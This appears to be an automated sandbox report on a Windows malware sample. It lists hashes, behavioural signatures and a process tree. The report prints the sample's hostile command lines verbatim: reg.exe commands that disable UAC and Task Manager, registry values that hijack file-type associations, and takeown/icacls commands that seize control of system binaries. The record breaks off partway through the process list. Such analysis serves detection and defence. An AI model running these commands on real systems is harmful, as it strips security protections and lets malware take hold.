Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-10-2024 06:10
Static task
static1
Behavioral task
behavioral1
Sample
e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Resource
win10v2004-20241007-en
General
-
Target
e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
-
Size
550KB
-
MD5
ef66bc948ca5ff1bd4e76191adc11b0a
-
SHA1
d1fb64af325b0cfaa165869d8fcafea672849fd3
-
SHA256
e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25
-
SHA512
914de2b160d607dfb87c19e52006c4c3724f8d96f7a7ae7d31d1219539745fc73a77e2484cc23459f33b16ee16f8356356380f759988e15dddbe5fd707b905d8
-
SSDEEP
6144:/pW2bgbbV28okoS1oWMkdlZQ5iinNrv26FYLIcw/3Scg1IReqYKztp0YcAvq:/pW2IoioS6p8IReqYKztp0YTvq
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
pid Process 4068 takeown.exe 3824 icacls.exe 3176 icacls.exe 3076 takeown.exe 1084 icacls.exe 4428 takeown.exe 5712 takeown.exe 5744 icacls.exe 1736 takeown.exe 548 takeown.exe 3340 icacls.exe 3360 takeown.exe 1608 icacls.exe 4608 icacls.exe 3132 icacls.exe 3140 icacls.exe 5444 icacls.exe 3044 icacls.exe 3204 takeown.exe 5452 takeown.exe 5700 takeown.exe 3560 takeown.exe 5284 takeown.exe 5188 icacls.exe 2788 takeown.exe 4228 takeown.exe 5596 icacls.exe 2572 takeown.exe 5816 icacls.exe 5736 takeown.exe 6004 takeown.exe 5132 icacls.exe 3960 icacls.exe 5184 takeown.exe 3644 takeown.exe 5444 takeown.exe 5424 icacls.exe 6020 icacls.exe 2056 takeown.exe 3156 takeown.exe 5300 takeown.exe 3476 icacls.exe 1556 icacls.exe 5016 icacls.exe 3760 icacls.exe 3896 icacls.exe 2280 icacls.exe 5780 icacls.exe 3112 takeown.exe 840 takeown.exe 5260 icacls.exe 2164 icacls.exe 1196 icacls.exe 5092 icacls.exe 5144 takeown.exe 4712 takeown.exe 5632 takeown.exe 4792 icacls.exe 5968 icacls.exe 3540 icacls.exe 5200 icacls.exe 3292 icacls.exe 3812 takeown.exe 5380 icacls.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 2808 icacls.exe 4232 takeown.exe 5996 icacls.exe 3096 takeown.exe 3112 takeown.exe 2080 takeown.exe 4380 icacls.exe 4712 takeown.exe 5700 takeown.exe 6124 icacls.exe 3184 icacls.exe 1608 icacls.exe 4312 icacls.exe 5792 takeown.exe 1012 takeown.exe 1556 icacls.exe 3540 takeown.exe 1196 icacls.exe 5828 takeown.exe 2956 takeown.exe 3120 takeown.exe 4628 takeown.exe 6020 icacls.exe 208 icacls.exe 5920 takeown.exe 5716 icacls.exe 2300 icacls.exe 3960 icacls.exe 5856 icacls.exe 5968 icacls.exe 5524 icacls.exe 5596 icacls.exe 1736 takeown.exe 2056 takeown.exe 2632 icacls.exe 5996 takeown.exe 1664 takeown.exe 3292 icacls.exe 4736 takeown.exe 744 takeown.exe 5464 takeown.exe 3252 takeown.exe 3156 takeown.exe 904 icacls.exe 5016 icacls.exe 5144 takeown.exe 3360 takeown.exe 5712 takeown.exe 5660 takeown.exe 5536 takeown.exe 5196 takeown.exe 5444 icacls.exe 3708 takeown.exe 1948 takeown.exe 5816 icacls.exe 5688 takeown.exe 6072 icacls.exe 4608 icacls.exe 5660 icacls.exe 5792 takeown.exe 4428 takeown.exe 4948 icacls.exe 4276 takeown.exe 5780 icacls.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe BATCF %1" e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\UtcDecoderHost.exe e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe HTMWF %1" e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe NTPAD %1" e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe NTPAD %1" e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe NTPAD %1" e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe JPGIF %1" e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe VBSSF %1" e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe NTPAD %1" e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe BATCF %1" e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe CMDSF %1" e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe RTFDF %1" e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 1224 reg.exe 1764 reg.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe Token: SeTakeOwnershipPrivilege 1664 takeown.exe Token: SeTakeOwnershipPrivilege 532 takeown.exe Token: SeTakeOwnershipPrivilege 4068 takeown.exe Token: SeTakeOwnershipPrivilege 1104 takeown.exe Token: SeTakeOwnershipPrivilege 1184 takeown.exe Token: SeTakeOwnershipPrivilege 4212 takeown.exe Token: SeTakeOwnershipPrivilege 4864 takeown.exe Token: SeTakeOwnershipPrivilege 3432 takeown.exe Token: SeTakeOwnershipPrivilege 1352 takeown.exe Token: SeTakeOwnershipPrivilege 440 takeown.exe Token: SeTakeOwnershipPrivilege 32 takeown.exe Token: SeTakeOwnershipPrivilege 548 takeown.exe Token: SeTakeOwnershipPrivilege 4736 takeown.exe Token: SeTakeOwnershipPrivilege 4492 takeown.exe Token: SeTakeOwnershipPrivilege 2572 takeown.exe Token: SeTakeOwnershipPrivilege 1480 takeown.exe Token: SeTakeOwnershipPrivilege 4712 takeown.exe Token: SeTakeOwnershipPrivilege 3112 takeown.exe Token: SeTakeOwnershipPrivilege 2956 takeown.exe Token: SeTakeOwnershipPrivilege 2084 takeown.exe Token: SeTakeOwnershipPrivilege 3708 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1112 wrote to memory of 1224 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 85 PID 1112 wrote to memory of 1224 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 85 PID 1112 wrote to memory of 1764 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 86 PID 1112 wrote to memory of 1764 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 86 PID 1112 wrote to memory of 1664 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 103 PID 1112 wrote to memory of 1664 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 103 PID 1112 wrote to memory of 3656 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 105 PID 1112 wrote to memory of 3656 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 105 PID 1112 wrote to memory of 532 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 107 PID 1112 wrote to memory of 532 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 107 PID 1112 wrote to memory of 3136 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 109 PID 1112 wrote to memory of 3136 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 109 PID 1112 wrote to memory of 4068 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 111 PID 1112 wrote to memory of 4068 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 111 PID 1112 wrote to memory of 2496 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 113 PID 1112 wrote to memory of 2496 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 113 PID 1112 wrote to memory of 1104 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 115 PID 1112 wrote to memory of 1104 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 115 PID 1112 wrote to memory of 1956 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 117 PID 1112 wrote to memory of 1956 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 117 PID 1112 wrote to memory of 4212 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 118 PID 1112 wrote to memory of 4212 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 118 PID 1112 wrote to memory of 804 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 119 PID 1112 wrote to memory of 804 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 119 PID 1112 wrote to memory of 4864 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 120 PID 1112 wrote to memory of 4864 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 120 PID 1112 wrote to memory of 1108 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 125 PID 1112 wrote to memory of 1108 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 125 PID 1112 wrote to memory of 1184 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 127 PID 1112 wrote to memory of 1184 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 127 PID 1112 wrote to memory of 2300 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 128 PID 1112 wrote to memory of 2300 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 128 PID 1112 wrote to memory of 3432 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 129 PID 1112 wrote to memory of 3432 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 129 PID 1112 wrote to memory of 3396 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 131 PID 1112 wrote to memory of 3396 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 131 PID 1112 wrote to memory of 440 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 135 PID 1112 wrote to memory of 440 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 135 PID 1112 wrote to memory of 4520 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 136 PID 1112 wrote to memory of 4520 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 136 PID 1112 wrote to memory of 1352 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 138 PID 1112 wrote to memory of 1352 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 138 PID 1112 wrote to memory of 3960 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 140 PID 1112 wrote to memory of 3960 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 140 PID 1112 wrote to memory of 32 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 142 PID 1112 wrote to memory of 32 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 142 PID 1112 wrote to memory of 1248 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 143 PID 1112 wrote to memory of 1248 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 143 PID 1112 wrote to memory of 548 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 144 PID 1112 wrote to memory of 548 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 144 PID 1112 wrote to memory of 3448 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 149 PID 1112 wrote to memory of 3448 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 149 PID 1112 wrote to memory of 4736 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 151 PID 1112 wrote to memory of 4736 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 151 PID 1112 wrote to memory of 3876 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 153 PID 1112 wrote to memory of 3876 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 153 PID 1112 wrote to memory of 4492 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 155 PID 1112 wrote to memory of 4492 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 155 PID 1112 wrote to memory of 4948 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 157 PID 1112 wrote to memory of 4948 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 157 PID 1112 wrote to memory of 2572 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 159 PID 1112 wrote to memory of 2572 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 159 PID 1112 wrote to memory of 1988 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 161 PID 1112 wrote to memory of 1988 1112 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe 161
Processes
-
C:\Users\Admin\AppData\Local\Temp\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe"C:\Users\Admin\AppData\Local\Temp\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe"1⤵
- Checks computer location settings
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
- Modifies registry key
PID:1224
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:1764
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\bfsvc.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3656
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\HelpPane.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:532
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3136
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\hh.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2496
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\splwow64.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1956
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\winhlp32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:804
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\write.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1108
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\raserver.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2300
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\msra.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3396
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:440
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4520
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3960
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:32
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1248
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\logagent.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:548
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3448
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3876
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4948
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1988
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4712
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4724
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3992
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\runas.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3340
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"2⤵
- Modifies file permissions
